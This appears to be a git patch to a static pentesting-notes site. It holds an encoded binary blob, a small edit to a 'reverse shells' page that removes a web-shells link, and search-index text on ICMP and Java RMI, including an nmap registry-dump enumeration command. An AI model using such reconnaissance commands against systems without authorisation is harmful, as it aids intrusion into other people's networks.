zM;skb5Z}IZMTk>Q!U|kAh~%Nve@MKQvDOt#N@!vsc&zOXhUvB@!7zLEvbM^Tb4DfR zcf0IN$vafrsY-8K&db8o!iQ+#0f-2;;`6;2lF_ZWw*wvX%Gl@d@afIys-Y3ukQ-L< z{35vJGPXT-VDO`48CUXit%n>Luh%&bE$x-T18cXDi9Ezxo2xgOb4RnZ9$hSr=o}}* zgXzh1+e3FUo(!_lHd}wZN^ko8E!>KpP{Oe0zJL41!`LKd*eR_e!{}l7N;Kg2JXHERHK5U(q@=jI?tAbJt;O_=o#+A8rRS0^c$K7G0@g43>`dKEb+ zgT`NjIdIen4$xNu2g7HeAQeSp-vtvvRlI7_q+MZQH^`Err+2Big2ac6PSF#q+UWT=!NoUy<=Ju=rThrKWxc8JVkYg4UMDefMw1y0H9H--^52 zaoYnQL;g>ZpqSK&J-@D9XX(laKvl*_h^1YosCZlr`Hc`wSzrN;1yV4#l=`I7r3{vC zUk~hGNEioG8dFO#(pV%Q2grGGoAZ66{JhwWQ%pr!86(unhYC`Am?;pw9#fOhp3q&{ zi%q*}lj^2@Pf^Hzc-1tBvX!HOtd@H`JpF|;aG9=b;IIy+SieK9agr##(xlOLFCgy0 zgC?H25pQxB`?S#4cW*?5GZ8L0V53NWO(|n>0CYG%B0mk%+$!FmoSg639~zN&o_l0t zRw+wo6vGuclTwRx=hhkE_D1mi0jfx{#bAZqYAB>IL4HGyf^w7gnrB}J8_9*dVU$*< zW95_LP!sX;7+1A(@+&ndI?Z#Dl#+$&sjge>f0r^7yHR9KIauo1{%5$8NXhpMeMo)w z7AOhL2{jd=b?)<{IZIJ#`h`()cJl}68aRD#CJtcUi4TM{o5rx9iZ^`rAetJW2BY1j1*3 zSA0duGlSjTi`^b+I0@AL$dP$J$74=iNE%DKPerTF#T`DZdsAAf1Y{B&E!a6DW@HV~ z%Y^+1vEFTShsU_~Os3(4suiaMxXQ&p>K4eaIR!d@UEjY;znM1R0`yPg5JIOXYk_SH zqR@+x2>5$iD{eCRSXn8o6qX;I4wx|sx=9e)Q>me}2T=G3!xFG|W!Oiv9CbhTT-c;y zG`VZ~Du8Ncm163ljjEmzuj{k$V!)A*NwP{G-s>-;>C+s}5d#V&3-|hBUP3KF7nF>Yl_@u{eKK=iuNbu;rh~0yr8!zYL-*U`td)^>xq; z0OJHCB5W$2_CTP-0r%0dW?lnp+t!VGia*uECcsDX*PE(Zyp8-?V8D zhTH;m~3%*qMTg({ZUR%%;LU5^^TO8=?$~Iye0-m?$?=!V3E{@T8*j!8B^CO6WTGP0GuRfdUBK4enuy&@q~1s?f$ipLV4cqlK@SyW)j(=O5*dme126KJoXFp>@AVbx3T)hZ^YK~P@~+|Zmw{6zQa*eo5e2zH5KcoAT{S#RAa<0;qVSh37R?>nwuNM& z89j_9adX4;o;wzT{`W*tF z{f-)yIFg5q+*d2(5YcOUo)-dMm>9R=!)HA@IfJN8m5w0_335|$aMN>0zq{|9ju7Hl zgb1|GV{t!b%qH47wI0y#TXFE==T=B>R)F}j9yKp(A-WX&kS>azb7)tWZ6*(LNrZD7hL=)-g`rD85uRLT4#4g8SNcG z7`cGz?wI%Gg8dIHshPR?#xa*Ak14UheMx^w_*%V-Zz^#sHxTq^R$)yyAdx~hatFi1 z!>c|YqG^|MIJJA&Nk}Z9*z4KZG?Z55?9TgH&fsqyb#;UO+wI80f`TkIX3ulXPtYL( z+!W5WBS&OHUZEfX_7IPAE+eco)qR)(rLQxf^*Sd-;qzMA+59e-IuD@`0gz>ghSPE6 zNO}UH&EuIk#X05s;?hWi8*GeaixyGEq?|c}jpIDObpiFq*gPbcAl@kQ#ydHMi!)#Q z^M4avT>&7kd8K4)c`W8?jajLtrpvhnsd}_I_H}-AZAINySP{^mJV1wl<9BrwEqZZ1 za!MLX3UYEy7()mW)ot6dO8rRcgxx^n9@nQmYy~ZG8_kD|6b8&gzyS3Fk9O|78@z?# zI2@u3Y|rRYZh3{R0@OljPeU9nZy#zOk4G(@~ zsPXGMg#9WPXh7=3z2ybSMEZWWprGRE*-t<-LNB1!6H8%mS8&shV%TiR93K+~H!UGV zG%Xo)Jx-V;G=ofwWre(|bY<_>?8_R{f%6ebl{5yW>_ATPSrj6VX z3gurfdkf+8Xn9%HoVupPDgg$mA%C@;0?nNH-~oh8;QEMP|He)8L1-)Q58Q-FhH7#7 zxF|a`S&Q1WOHE1n;rq{Ql+)3~q7#KNoq` zNpZ4q$b&6erO0@S9s;&BHU1`41k@&s$Pp$DK7Re~9TMAfAo@fMdPw7j{&o749Yh6X z&Y5}lk1W(QY`L_CV|+#L4wvx_J9G z$l;fUuHfdXZ|c+JBJ3eyF_ve){wPyJvdg>iqOBRwWeD)Lj*gS)F>8%>=~njeT^5wU2l2(SvjM)%*9{p(geR zIt3$(7Impy#8B?()h0Mch|#|wx=|!SJ*C>m_?TRTX-&D`$mvIlPd>j7@{onf(ZBGd z8?m3q#HUg0a6TZy;8l4-i27_lm`&h83KUjqA7#sydu1=rk}0v|7SNQcgoer#jQ$i9 za`N1h0PCdV(3O5mmNfXh=2*qtf_HlG@ZnihRcNX+=7H0;lOGPybi)(0*T&XXLEo_G z;lrfev0aQVEJpvRCPN|H7AnQVeIkJNxjJ!8QF0mREl z^uoJpwGgX751V@W{Q6WM;f@BQnB}F(X7zLtaZ(f;&6sJZ*ovvVwbETi)GjP4i+67&@KZFOp!f zHhA!4Pow9yn4p>_Ay@n$|8Q|sWF+vOlFyakrs)BnU_MgM%^0xfA1y#ynt}vGpH|ru z{U^H$R0>g?iZ=PL?z3jS zr11s#Qa~s9Qv`=*_m^T|!JANRvM4#7XeX8L3RqVp0C&eGGfRLLD}gS-H6X}ge9I>l zjOx}_zTnAVq2eI9Di;!`DPYbmum6|vP=W~M*K2FX$^V#o$wdVI6TyTqJN%!!EGMU@^MCqB zg!lN!7b=sC;en}Pn7O$A z423=5{rE|f%rJmNTjoZW@p-fY@JslfkbfFYIdhCHNOD)!zUBFsyb~U!OzcAC!;*we zBzwafLrQTXOfcXqAaR1(%GT-@XaIl@&y_e!5A7m017E%t2Y3Iq5|rimD&5#+Q_lFD zN==2c97A;u?1yD7B^TkH)C=T5SuAGuVYfx=6^c1Zb(n(&Bs$s@paQK_!0?up?5)(i zEeWn{sm7P#matQOrk&2j?4E!hepa&oao7&fvBIm^m+(JeG z;XaiW|ISlD<;H1|t(DtxA5tVZG>#&b<=vW}fn1+Wy?F9gx9O2TB}|i3-DS)JhKA(- z697+Aj^mEj_|CoQEoBpp*hE{-<2X*J8JRLpFtyDWdXOqJnbGdq*w8i`v#IjLeNUY{ zDX4|`+Cu0p2TR7QM0MPfU!SS4DnrigB7hVOXz&?FZUL=X1lE!Z>E!0$L@|X}K0HB^fut zhlOW%{ZE0Vg*0O^($~ZW#3rAiL-=zE>vhE!H+pe+A-F*N%#G*H=9Sk{Py_gl!!NzO zwnd2>g}Y37EfBRpeTv0bg=w>l%le8ogEdQZkGEb!?EMN_zy&w`NN?(DzRU+Vcdq#C zSsi}QEaJF)fm{F_fULAm4q^CH$vg})kD`8MBSQs&$bnYPzw@PK+lJ_9QURnc13rR7 zoqwUj&RYUk%F-&j56K4h)(zL(No!GV0e9bFG(`4HY#>%*LBpz3f3Jn?gu6>2z-fV6 zq4|_VZ^*jfdmdPdwha36?82s+*P}5;ap}9K%PeD!)eixj z1IE=a9dO@LcEghmUwx;ki$!3-fUX1k^$Xjyi4j>x>9fV<564chYs<|-4aY0UsyRNf zW2ofO$qNAd`Yi0;27`t8`BhPKUq|4A^cv{{L{iz}O162&W^v2) zT>E`KWhGv>H}dlZQU2%8nA{+k@H#b#AOX=0qL4VNV@wv+5*Z4o5Xdy;C8|b;Wy=Hz zgw`}P_Ku?Jni{4DP;=2jI&$8;w{#bx19@_~yg#TTR|kAKmn721#9UAB6}b|TYunD9 z3*U>uI0=T}r3|-1j!2Sod(U8Kt$xj21pBjVmlTh~gMj=wM&o14Z9KjiRtk(5b= zl>Q)jb~Eq0^CH9$DYSrYM-L*;dDqrXUr`Vp#|~M_w2W&Y_1rP2RwzR{7WOj?T7)Ve zSE1MF`l(H^Pz6mVm38|#UL>)ZKHUPDD%VNDP5Xal=1f#24vANpo!YlA#Z+BY)vuXa zEC3wlDTUcgf_WmGUYd`rxQJ_JPc@%`qUQVEfKAPxtSh%UYMV03YqPcfkP96L3<#Y_ zTPtuEXXm-Bzj3^dqUY9q(TJA4Z@FXQ4~O5HBR|*}H*dtVu`SO}E^x{&EuCM#|Nkdh z@;*R_T~>1Sx6-WyS&(`Tp;sw6(4q?-o%|a)PD(|~^|@&XsoZhFcnwUjbqtT3sb_QV z{7sq(Dd*9@+6kP8S5OzjMS_>^%pxE=mL$hPVIBtt2I!2F=kUg0(h++JxN)(|)Tx2! zhLIQN-n@A?8liAIMMXDYR}^@V78H$8-R@(@0&z!Uk4YnGil;T1n1AjafAAhx=AVRF$yZ2MX$jpCoW3%7F9VOy-71Vp6!9|?#EcYcJpMB$K zCD>C+_cJy=$9O`?E6_(Sf>2&pTRVUdxn+yKAZ@|34{54D=@!{Y9(L-+8nOs*H|+G- z;Vao;#A|As#;+Gz=4`ek<=&TBPuxc!85_}G^;P>g0q_}kexLSAz!)@oQhO|L7`HNO zGu`XW$2s|zVCFJmLghQ2ld_Z_XP2^+6(p$FDL7?9aU)Dhuc#19sr{^rKf_ybF2ML9 z;~PC%fNgvCe)n{5OOczZF91dbN6;Vk2!*?Jd1{|JSiXZ`bK&w7TLz<^Nh$O4efBS3bUOylg zULnacLB4R*i&=iOIAOu(mBM*L<}ANv2CZS+w=-*Mp096XcJ1OG`ub|Bs$+H;|DETR zjtUADt4xSY%saA~g8 zj1eQa%NBh)ZIz45PkJX+mNIwBk~Ez9RxMb)`6my3dY9g-A+Z2RL9Pq-DlsH_e23%N zQ%=yPio$N$G84%w%&%HZCi*n~n%RyTNa6&)uv|L0O|mD)N8N(TMHA;sJ=GZr@=L_9fFDrT0UCNtzC1nz#%Af zk+@8nKE1CCc5NH~!TuU985?O>%}2rHUf7OSO^#Iu)9qWg&YV4a(5&n2B5QDQVc{fC#sk(b(T2o1vK@g{MM9W$uKz1ls!*Pl0{H{;Aafv(On{$K|2!}0#Bj1EV`kDjxvhjYg#P}rNN44%pYZItqt(7 z(UTkKy7)Wn6jkyquM{9`6C~tP`|;!NvG`hDJ}Z*2a)dz?J9iq$Hfi)L;|UQ$2Rb|; zl>};3mI6$o6vY18L6BLT_bXk^dLrmzt3@p!I0%Yv&}G%LCqr&`0+(S1$1QF(U?)ck zc{Nycl=$xPDW(kXq;kI-;MR#r9!!$5wrh#wR$%J*lnG^`umrWX-AJ5vDw=zVozmUg z^61RHAM~Pifr^7KotYAj-T0h!$3jL{m91HAr8N~(riskMtwBd+yk z4!q+a{gm^w4sj)D6r!*w?$qh^`}b_@o{uJgReKle;w?mN%qdOIx^l$|#k&3)o4y~P zc6r58xP`7JK7RiGfE|#Q>@Ncub`hn+Ta^}W1#@kuVI05vx0doD{-eK+dP_(_I3=R~1EyOS&MLp;U>V=t5 z0kpVLfZZ*PKv@FjPT6|XQ6a2 z+wu#)4>A+Zddq%Hu!k<>uJEGwh}4S55Nh7Dql=k<#vnU{f*j`|umlXg2+#RZU!8#d(sW~&=C_J}E!;P&`TJlY zK7I@$^S&VP6UYFV{b^ueO8+p*1=`l|6NNAHFsAt*`Wbd^xKzruk~1;-gd~6o%jPup zSi7J6zL~C7G>gHYLVPOe9Z4QKV_1btFn#3FeTgeaphyBbLSeG{Sm)+94bc$pUWklyHHO12PAGfd7bS)7+^H^kMcxIq zv3dw483HoYOkV}dbtY;6+-qsY3i&!}tgszjePmbE#$3(!Fy>Ia71x4@UbPffYKUyg zrGS31TJF0b_-T0ZsAa3O_j<@Mgyco1CoRX=?SH|3)o1_f>s?xo(E8tIa1vR~_eAx_ zw?#fIwI}M6ebF^2%+RD8Fy+JvNA%eh6QqXAn{UDmo!AiuEY=^2W}+7V!t@Kr6Z;I5CD{+Xotny!Y= z27iE>7<$r9&q^2@UkY@C^RH+ur%~U&YVWaVWwxzEM%K`(b!&-IU6F!F^qWS0J z`yH=~`MnuVYbT#T1OF8@$G?@N-in)=$9~eGxZG0)3bB}ziPqVc3%05uRj`_mpY2Hy zY{X|KW9RUtK=|_J3U-VXsLU)uo{0@GImk;kIc<^A7H=^>Cf`1|tvczzfquIMU`IuY zD~2me-z)AHE@YL!vx`p?W?wE@lIk%Ia^TJuhAH;!i8WyvK@?}QXkS{Zd`O;rOxR@4 z(RwK=C}0l1+cMZf%lEN{MI3_Rx`u|p3xClY$SGR%5OEHgt)@(smUB%`y!wg&cL}wu zDF>7ViM*8Ij~Q^|b4vw1-JZb%I8_c_+$30dv2bBEskaSeJ$v_Vg6TrEoX_p@SFspj!ZIC;efmQPUAt1cm_TD$+bI8&;)a&~6?biG# z-SYNyuIt4!Z8Dh+OdN{t>lHOsw7`eXtok>-M#xfcNa$is0uXFJd6*I zPOZ7&xp(m5b>h<$&D5l5WjUmHs_#IAGW)Q_xO~B&n`S;DHa>QYewIbBmqJ41=)ZwK zU}hCP)7vKM%M9JGJfn-8j%)5O_iqy8<<2gXO$3>fU|$2qQcS$u!KHMpLZrUSRTQ z+eT!rJKLsf_xH5N&tLGQ8Y6V4v2*5Ggo8?M%F>4 z%0wM%+~zP$_K!wF_mR*yR1(h;Q(Iqzi)!gapujl;?m;s3=GCjf z*H2p>{?+`p&5$<_mpIOu%4i4VvjyBr*3IG(%0BWi;=YB2P`iTPbTh?OPj-4nn z3jUFsH(WXv(%RZrD7a>1ts9i2MfWVjbLl4&atP=viWmTXj6hzZZWKvCNPt2um%fdn zQ-eQ*3Jhxcxm+3w6iTJYvYG4RBjn6|r!f}SF!tL~IzzpXrjWhTxLO3vOlTS@n$dqZ z4Q+_P8kpomk0P94C-D7J2GxXs2m6oeEFQKY5rXB31YMV;`##u%)FUqbR zKEq?brkq#}ACu0VM~XVLQ6nV7uW8*WU!?T=NdSp%awBc5$D3)I#5l}pwQ=J{SdeKm zXYN0@=KI)ItypvIjs#a+&1Ahi~NN4a0bZ(t^*tK`6s# zov}4GC-3Puf2)Q>08A?FdSVn8!OG)RsEXP<4Eo|+f{G=mI0%(L3oN*yItNcgjBlo+ zAxD}3P#S7}DDJl407C!c;c*6w+O(t(?wIkL_v=TFR?TUKt%WRtWe0Kw$&5+|C0Dh; z%Ln;FvS=84gq%yLpKOcg6Z2ID``bMGyZPFzZh7O9Mt`e8ay83=Me0X_oeYsE)SBT{Y5mMV^E#+ZdamXq6h5Q%YFhtlEUNya@DrEM*Ud8{rg$#}EDB{#7#5OHzFweRzmnF)w)f{Ve$$Fi}iRcXhGX@x) zzqj?m;khxhw@yAB^Zed}(Fb>Q_IlG}+Mu=z!{q0!o*7*>?RNk1daVZ<9cq^u^2Z;G zgM#-ID<7SfTac0U?pw~#JKyen4a}d@;m4s7pMD0Vw~>o->M?R_!hAWoXT6dy*F`6c z7QU(TMHt3gg+0vVd;Kb@qQX1<%IusiTz;uBdg}bw-wL)n!t3S;#b3IO*WG`~-a=|3 zc_hNi>YIH=^Kazh1G|h+m%Ew)z;Wd905h|57~d{WZTYN^Vi)816Oe^ zpr_@dO0;bi;qk#j?lRV%e z(*>htF@ZC<>E~DUxwFnbjTtn*F0-vsD(Xy;Ab&+Fl=65FsPWXP4YezL>!*D3iHg0~3e5G{{b?7X^u_Qi^$ zCr|pJ#if8+`HHz9;o7UJ%WNewyM)K*7R`e2MKg|ZQZ5>B9v;RYj6=9FFHI0FiiFwi zd?lPie4d`^!$2+%<4d3Kj$U?gny8x5%Lob&Vt!#@z&KEWtlXLy{aqs5@Q{@qSSS)1 z@R=(;?}3+CR}+p-{P5zkIcX(yg8ZlcXdp0#>e6mqI;N*UGQ0rkkb5Rys@VYVKJn;g z%xx7FpD?-XnEIE97A z3@Hu!7a5939KCSCqN$;lQ?2Rw@x10Wp?H0Ry_{4ONnQKpGmj%eZ{*fQa%$MI2Sr6G zb{`S2bkpHy+e(g2JgVt6tnSgQ2^S}PEO0-cbmfvX`Kc?ixOlgxSMI9VK@uj!W^txhN}uVM%rKquJ=>;Lt4$1x%gSO)YOz4| zw^f3UknC~xl8yur3NRlW2-AzS9^J zve^0g{9#`;livswi1X+OzW8%fe9-bti^nIGgVY2WDDLV%`zB@W-W6{TLu-<@#T9*%Laxrognp`mo@}HFy4CwVe4T&DID1*?jzUV_fpWryjvLs99gh4s~mnn(Hh$!}jHb~-$?gMtFYNa^vNx8_S0Caq{q zZ!(>hH5Xg^cGA*%j%CVU(mgH1#v6pi`_J6f^?r}Be>mF~9Jv5B5W>7@PWSY^%EyYCHYjP=9sEbX%F$DveK>^5 zsuVK>0Dqfg=3R=J#L}N{)=|j<>)mheph;l+$gS3ji>Q7vPOq)2d(i9!j6&(bnx2}u zSscmhm1JT;pHB@e(Q*tsx^-6gomsv66mQFl1uZ8Sh8n(c=5Eqah?cVY#!}WB@Dg>XsK+&#%aXTAD*ye*dG_3!1~U zM;wpPFzBo((jJ?CJ-(!};_kXWY!M+qJ`BQ9{8S=|wM^>Qw{P2~E?_G2v0)NvN=YQ{ zsij&0^-%l-ee`ev5X<$}ob+oKRBc2o`OdlEpXuJU`?{=YXw74r zDEF5?mRnWD4wPD(YA!Zg7TM}pyt7-oO#j81uFnF;`%HCq=xpk>?>-ZW6JA-;B*!&c{HVY00P^RCR*!oYNs+co zbFm;?lpF1>ck0FNro1SPmq|zLx8Jh$+p?wZNO(_mqD64etxhr#p@;&?#DN z-m6T1+SZ(_7cC}rJo+L`bMzz~YulYh6E@!266_UyecZ{Z2^Qnp6unO*Y$x+LTpeg| z+p#um&Yq%ke=d7j(Y0;lK#*FAr2lF$gK^gj8 zLrU}3uj<*qN4c1nz6SC>yC`Jvze5b?&$<_2%niy^pQg zHY-|3$ELkLUSVmNzLjPBYde)Q&N6Axt((*PnHHpk-w%+~IYg#fHXmD*Dfz)}Y_HaiDSM#Oqul9xmizm5s}^=LbKRDP+J%)( zc9GddobmI~9hY+ASkWrG6E6>>9?9(4ndzO~_LrGg(jAv+YG#ComF4y%T%DQJaoqNN zA8{Sx`>}f#d1}vh_nGOKTb4YtS4Ko;TzF(hV7z}%Q|Id1oPIgaZuKgQ{KD@SixuGk zlAeaay1tF2kFMvuy5qXtv(+Gct%cQE)m7gNc=DI7h%Gri((-h-G*j8>oJNBQ+O?`} z^8HRCjsMl9X-9vBjq?+3K6_Wy))3RvnPb-YrpI}$hnvYOoB&R?SlsXd3! z8-JvbHm5xO!2K|zWtp}vNk8eSW_cWpJ-u?tfZ59OXua?QOXCmXXGS*`d)vA^i@!bb zSgn_zS@>6>dIQ?LJU1*7C#W!H)Q7zm2G@HoNNNAbW5atM?L!ClXZdSis7RycCdq8H zlz#hlCDJyV!fEH$Xvig_1AUbTavBthrJX_-5YAJWjY>C@kHnSV=mAwSY7=K-k! zG~rQ)FTYx$#4M$O1JS(=UoJ$g{#hX$X~Q9UifMR)7dFWJDN7rD5E>jT6W^cP`3g}S z#|H~4HhoQF{n+8LP@2e-K27@2@_6|2(Xz_HG-kA%f*#5 z$My^(4l8OMDAgX45HFd@C}N2NKf5-!D_z2jN;jxfzd9w#+s&lN&|6DNJt#BG3_E{~ z2*>7JbQXX_MKE_B95PT6)+b{H@^&mmGB#>+B>q+B4M+-mR$@DgK+}gWK_!$_(unv` zNQ;Gm_|S>@i^h;VyMu`6Pv#5nUAvZW#C?UX3OUZ#4*817mT$M~Xfdr9mp;4AFD^kJ z;-7(HzQo)_oUIF}l)^(NSa%uBi8~9 zVMI#ZLmnG{Zq)bu1C_Wt4plG!C_&n4_L?z}D)MF>&%fEv;~&w$152@)LLMOqHSsO3 zIb=W&7iulj@KE^&NO*TTy^mDXG*KYEGQjGgOlK<>lS%Rn9(`D1=O=WUBE5T4!hIwQ ze_ggVm-*vK52Epg=B8;xdym%BONVr$WE68GYcqf_~>L#7CN#@Cb>0C)) zDo;@DxiPRj>~RC!MKzMp*)&dP|kN^8Abf<;l*4AV@2Euyy(#YYd~LA z{M|%EvVGN%cQHEj4YxH^WpW}tVy!!F<>wotTtm|*X47hDJmDw@OS$r3ifs)tSB{4l z$#!D*Z#t8<)*%U5H%ej}kBo4T7U{b)KmVwe~)R&MWuq65wZQPn@ zi?(MKZ;SIVaLZ*h;nb;j8{5sMx0`c6N4{xBQ$sQc+!L&B5*EUObSXR($kLIF{_@MK zU?1F1+3@jn$zHlNbHNo#YziBs-`}QPWYyT5c3zZXJ3Y)4%07h$zMz>ihs$+Idr(!C zd*Z}GoyULfGvcSC>1k`qI^b_ClVlYYU7$`x9KFb7o(Tl>IowDuuk_*H@~J)}yhlND zjz|TmX*He%V!{GRO?)TBlp$(2X&tCmj-1|GJyr5DP| z47fCClp6A8fvv$uRgwF~Y<=_8kC9>m(uECz_Vs&yp%3`P7x?ip%=GM0o(x;tXe4d2 z$nNSKd;Q%{*6}>dHOx-%cL9MD6eX)R``o#j{j9=*m1+TWCLy_;JR1>)j+T}HbsSCf zn^i15*M-bla&~L##6a@|a}RYZkP|0skNzHWiJ2B-WmHSF+6);qsO|a10YLa_#qbZvGedl2US1u*}oY48Kx^Kv{ODA#`zqIWa0EG&E%% zV>-(dFWVB2dv7}!5yz-8t{x6;?`*awZVL|!Be>XUR@#p@?;xn}UK${QmEuM9L!BV( zPLLBx9H2qN9tnlCzp1GI-`yxJ^&yZD;=7RE0r0_sieAVk(Z0|0^_GP0+ST2Vl)^pH zP!rBDJoW5d^at&yH7p`xYyg_FW$d3wngqbf!b4}`sv7}4;4|xPT&N*flv*zS;T*)Bj009&;L0#BzfP@CA zsE8@BK7Oo$*8mENYPOr69;V+GO+F5-bWK5iHKuFY0RkfD0GmS*oOki!_K$~p_&(my zSlo=P7dl)T1TIQfBrCYA*^3jvwCmmFBdhhlXQU1$ZNwoSI&~AoH!s@TlOL!tmK$LU zbv6hOQ10&8BRbO#Vo%_fW>c$C$Ci|l+cjUYkgb9(iMSgtbK!aP8Ep+FjV}ZySXw5F z0Z9O!-CNYe!Y+t&ST9jnhzBxxcaYt?hO`n}-^U^P&pf85<-=Tc&np&nO?l(i$GL;{ zh5SPbui+4xrlNWiY+0><+1^&E67K9~ku@;mTL)&I=z9@mc*M>0i$)TD@s zJgY@6C;yPbvk@fr;vfHp`1?J*{bzDee}~m+Ho=#w-~VdSXrw9} zjt)JQkUy^A7iY{@1B1MjxwR`3@(PKby2;ou)9!t_i4UZ{+HM)8Zb*Babt}7LMElqI z9tT7P3y%@^ot&IrR0VokI1RQ~b1+*ey>Y|WL{f1MMZ>u@3n%)xjyG(nFca@g4rC|Z z*Hk=p_U6i^G2$JUzHfi{gTI5xp8U;+e3ktScq?|*1Qb?-lJw>|R`30bJ@3rW7AgA< zi(%<$)qCd?l@ET--4i363R>#7psDG?6CDSix3{`N-np}> zBqc_Y=bmBo^2Q{nh1Ie|*^?MQF`**NbnuWNke_q-NMgnrqB~nVjS_M9o+92FGI%hg zJOPW0DxIth3WnHnbtMB_QSzLkA2Hc-z>x8yXuDDT6oV91)h%H3Si~kMA0yDA_Ryfm+R2Fo`q?vgU6nuySr5(7&4d~y2mm4%aH6%M=*8#10%gQI zuZWbSHXOhdjMYU3UpRZD&!$ZUtIaLQV%8KND@6szIHS|(7jfWMGv))3Bz&K!o6voU z-riNIbU(Z$ST8&6T*$P=*HlQ#N=kjzbX9J`tBFBPufS{V{ZNVn92Mz zNixbVF)RnENEFTqrEW@62nP?!J*@bpK{%%2ozYhfntnlyVHDP<0ryj#%qReWc2V;p zs7EFjAn|)!R>j7E5_Qqkt+Y;%8IgG;FHTUI>>{qftPqut)W{VPz>2aIZ1h}g?2IIt z&bOz2r4p6~F#~nAZUi*L^=-zpW))1e!a#=nEkIJW<<)Z7&6=mn5$<_pa2iO|7z?jv z%qa#+sLu9j>=Is@v9S-w`E_0=ziqj@S0FG8*9(jw{ts9LQ-q{SMw6KfLZ7`7lGi@X zM({3Vef`uZ*4SPpd9;U7N^#)LD4(f6$qsY^zGRer&SoFlc&0@lhhktEy%lDl>H!jx z!M$dh%5zmd?%g?~QaX2pA6Ysd4+~wRx3o4>nr&-W`fYbQM6SmTC_nScMk<4@XIU*Z zV5o};=GbIDa7|eQUQLogaSwxs0a(HdCxI+H+%;MrH*WYR=J=gh6?$`(7@Px(Thjr1 z3pJYETA)eNMW#)<5k1in8Qyiu$;wTQ+GowEy_t#d;KT}iSMB`#{L})%!%JWRIQzEX z7L&H;&m~gxItPX?zygM4MO##KH<5~n`rNlAy95R>s{$LUhXpA$?jE*ZjKnYk<@?!f z(;Nxh^sk$qN#PQ63ihVvFX6_4Yfnov;{0p z&dbIU!RZ`)?YJ{CUmtI8;1@SKzZAdcLK3)Wt7$*7siq2%Wj(2BW22_YU1WBF63e8t zhPe1mn|Z9R8SF!$_f2KP+{26UNrP*#8qtGBswMlCE#(M3+;HnOO6jVEz~CP+s|a-R zo!yfmUqX{b6uFdX&=SGWQp)<`|WTxzn!5=Ei_i3n&U*;Vt z_-bZY;~%CTpN0wUPZ>9=Xy3p`oN`jx0o@q?>!vDe1iJ=9sGep`JdS0 z{J$>1q!q~PeFAoVd7i+e#Opm#DZdZ-s(DqP@YZjeVr%1vs@=!G*|oMs{tVs}OX*Uz z>h4!>Ch$l8D)|V(W34To{P4nOoLoy1FMcW38qOK&reP;3LYP^Stf8i6Lz&+u@mm=J zmi=-+W_Qf_DQj+ZUy||6Xr^!Sni6MS$dQbmj6VF;x_)8#-JdJOE_^qz+xAN49NvoU z{ku@?zI@~6&3~AH@i)BwiKOd))~9ij^4Gt_oc?#9?mv_D%8%r~s^|Xy=>9{O*wUl$ Yo$dXh-Z!fRHm+bYbAj=3sr?Us1$1+wGynhq literal 0 HcmV?d00001 diff --git a/reverse-shells/index.html b/reverse-shells/index.html index bf5cdb9faf..4fb05fd6f8 100644 --- a/reverse-shells/index.html +++ b/reverse-shells/index.html @@ -15825,10 +15825,6 @@

    Reverse shells

    -Other resources -

    See web shells

    -
    -
    All about shells @@ -15942,7 +15938,7 @@

    xterm

    - Last update: 2024-05-31
    + Last update: 2024-06-08
    Created: January 6, 2023 21:39:12 diff --git a/search/search_index.json b/search/search_index.json index f31b8a9728..53be17630a 100644 --- a/search/search_index.json +++ b/search/search_index.json @@ -1 +1 @@ -{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"","title":"Welcome to Hacking Life!","text":"

    HackingLife is born from the urge to document the knowledge acquired in the cybersecurity field and the need of being able to retrieve it.

    But there is something else: I strongly believe there is not much difference between fixing a broken faucet (or opening a lock, or studying the engine of your car, or walking in the countryside, or\u2026) and assessing an environment and describing its vulnerabilities. As a matter of fact, I spend my time doing all these things: fixing, repairing, and creating narratives (yes, writing too) in which magically all parts work together harmonically (or provoke the end of the world harmonically too). Tadam!

    ","tags":["pentesting","cybersecurity"]},{"location":"#second-brain","title":"Second brain","text":"

    It's quite intriguing how brains work because it doesn't matter how much information and resources you have available on the Internet, still, this is something you need to do for and by yourself if you want to understand in a deep sense what you are doing, keep track of it and so on.

    So to be more than clear again: the main reason for this repository to exist is purely selfish. It's me being able to retrieve my notes and build upon them a second brain. Therefore, there is no intention of being exhaustive or giving thoughful explanations about how things work on a deep level.

    ","tags":["pentesting","cybersecurity"]},{"location":"#acknowledgments","title":"Acknowledgments","text":"

    Nevertheless (and to be fair) this idea is deeply inspired by Lyz-code and their Blue book. Thanks to this inspiring, polished, and... overwhelming repository I've found a way to start making sense of all my notes. Kudos!

    Finally, I would like to highlight that this content may not be entirely original, as I've included some paragraphs directly from different sources. Most of the time, I've included a section at the top of the page to quote sources.

    ","tags":["pentesting","cybersecurity"]},{"location":"0-255-ICMP-internet-control-message-protocol/","title":"0-255 icmp","text":"

    Internet Control Message Protocol (ICMP) is a protocol used by devices to communicate with each other on the Internet for various purposes, including error reporting and status information. It sends requests and messages between device:

    ICMP Requests: A request is a message sent by one device to another to request information or perform a specific action.

    • Echo Request: This message tests whether a device is reachable on the network. When a device sends an echo request, it expects to receive an echo reply message. For example, the tools tracert (Windows) or traceroute (Linux) always send ICMP echo requests.
    • Timestamp Request: This message determines the time on a remote device.
    • Address Mask Request: This message is used to request the subnet mask of a device.

    ICMP Messages: A message in ICMP can be either a request or a reply. In addition to ping requests and responses, ICMP supports other types of messages, such as error messages, destination unreachable, and time exceeded messages.

    • Echo reply: This message is sent in response to an echo request message.
    • Destination unreachable: This message is sent when a device cannot deliver a packet to its destination.
    • Redirect: A router sends this message to inform a device that it should send its packets to a different router.
    • time exceeded: This message is sent when a packet has taken too long to reach its destination.
    • Parameter problem: This message is sent when there is a problem with a packet's header.
    • Source quench: This message is sent when a device receives packets too quickly and cannot keep up. It is used to slow down the flow of packets.
    "},{"location":"1090-java-rmi/","title":"1090 Pentesting Java RMI","text":"

    The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

    A Java RMI registry is a simplified name service that allows clients to get a reference (a stub) to a remote object.

    When developers want to make their Java objects available within the network, they usually bind them to an RMI registry. The registry stores all information required to connect to the object (IP address, listening port, implemented class or interface and the ObjID value) and makes it available under a human readable name (the bound name). Clients that want to consume the RMI service ask the RMI registry for the corresponding bound name and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary DNS service.

    ","tags":["java rmi","port 1090"]},{"location":"1090-java-rmi/#enumeration","title":"Enumeration","text":"
    # Dump information from the RMI registry.\nnmap --script rmi-dumpregistry -p 1099 <target>\n

